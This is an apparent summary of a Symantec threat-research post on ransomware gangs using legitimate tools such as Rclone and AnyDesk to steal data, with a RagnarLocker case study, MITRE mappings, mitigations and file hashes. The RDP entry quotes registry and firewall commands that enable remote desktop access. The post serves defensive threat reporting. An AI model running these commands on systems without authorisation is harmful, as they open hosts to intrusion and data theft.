Threat Research

Data Exfiltration: Increasing Number of Tools Leveraged by Ransomware Attackers

Symantec

Ransomware actors are increasingly abusing legitimate, dual-use tools to exfiltrate data, rather than relying solely on bespoke malware. The RagnarLocker case study demonstrates how Rclone was used to copy data to Put.io, highlighting the trend toward stealthy data theft and the need for monitoring living-off-the-land tools. #RagnarLocker #Rclone

Keypoints

  • Ransomware actors are using legitimate/open-source and dual-use tools (e.g., AnyDesk, RDP, Cobalt Strike, ScreenConnect, Atera, WinRAR, Restic, TightVNC, WinSCP, Pandora RC, Chisel, PowerShell) to exfiltrate data and move laterally.
  • Case study: RagnarLocker (July 2023) shows a multi-step attack culminating in data exfiltration with Rclone to Put.io before deployment of the RagnarLocker payload.
  • Rclone is widely adopted by attackers for data exfiltration and is often renamed to masquerade as legitimate processes (masquerading).
  • Data exfiltration is a key step for extortion, with attackers leveraging stolen data for darknet leaks and coercion if ransoms are not paid.
  • Protection guidance emphasizes profiling trusted applications, measuring prevalence, and blocking rarely used or unused behaviors using tools like Symantec Adaptive Protection.
  • Mitigation recommendations include monitoring outbound traffic, auditing dual-use tools and registry changes, restricting RDP with MFA, strengthening admin account controls, and applying application whitelisting and PowerShell constraints.
  • The article provides a detailed Indicators of Compromise (IOC) table listing numerous hashes for tools like Rclone, AnyDesk, Cobalt Strike, ScreenConnect, Atera, WinRAR, Restic, TightVNC, WinSCP, Pandora RC, and Chisel.

MITRE Techniques

  • [T1567.002] Exfiltration to Cloud Storage – The attackers began using Rclone to copy data from network shares, e.g.
    “The attackers then began using Rclone to copy data from network shares, e.g.”
  • [T1036] Masquerading – Renaming the AnyDesk executable to appear innocuous, a technique known as masquerading, e.g.
    “renaming the AnyDesk executable to something that may appear more innocuous, a technique known as masquerading.”
  • [T1021.001] Remote Desktop Protocol – Enabling remote access via RDP, including registry modification and firewall rules, e.g.
    “For example, an attacker may attempt to enable RDP by simply modifying a registry key: reg add “HKLMSYSTEMCurrentControlSetControlTerminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f” and
    “netsh advfirewall firewall add rule name=[NAME] RemoteDesktop” dir=in protocol=TCP localport=3389 action=allow
  • [T1059.001] PowerShell – Using PowerShell to run commands and facilitate exfiltration, e.g.
    “PowerShell: Microsoft scripting tool that can be used to run commands, download payloads, traverse compromised networks, and carry out reconnaissance.”
  • [T1560.001] Archive Collected Data – Using WinRAR/7-Zip to prepare files for exfiltration, e.g.
    “WinRAR: An archive manager that can be used to archive or zip files. Attackers have used WinRAR and similar utilities (e.g. 7-Zip) in order to prepare files for exfiltration.”
  • [T1082] System Information Discovery – Gathering system information and related steps, e.g.
    “gather system information, save registry hives, execute commands on other computers on the network, and enable the Remote Desktop Protocol (RDP) to facilitate remote access.”
  • [T1003] Credential Dumping – Dumping credentials using tools like Mimikatz and LaZagne, e.g.
    “deploying Mimikatz and LaZagne to dump credentials”
  • [T1046] Network Service Scanning – Discovering hosts/services with netscan.exe, e.g.
    “SoftPerfect Network Scanner (netscan.exe), a publicly available tool used for the discovery of host names and network services.”
  • [T1562.001] Impair Defenses – Disabling security protections, e.g.
    “PowerShell commands were executed to disable Local Security Authority (LSA) protection.”

Indicators of Compromise

  • [SHA-256 hash] context – Rclone – d5e01c86dab89a0ecbf77c831e4ce7e0392bea12b0581929cace5e08bdd12196, df69dc5c7f62c06b0a64c9b065c3cbe7d034af6ba14131f54678135c33806f3e, and many more hashes
  • [URL] context – Put.io endpoints used for exfiltration – https://api.put[.]io, https://s100.put[.]io, and other Put.io domains
  • [File name] netscan.exe – discovery tool used during network scanning
  • [File name] Mimikatz – credential dumping tool used in the attack chain
  • [SHA-256 hash] 109b03ffc45231e5a4c8805a10926492890f7b568f8a93abe1fa495b4bd42975 – AnyDesk
  • [SHA-256 hash] 7d531afcc1a918df73f63579ca8d1a5c8048d8ac77917674c6805f31c8c9890f – AnyDesk
  • [SHA-256 hash] cdb82be1b9dd6391ed068124cfdf2339d71dd70f6f76462a7e4a0fdadd5a208a – Cobalt Strike

Read more: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-data-exfiltration

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint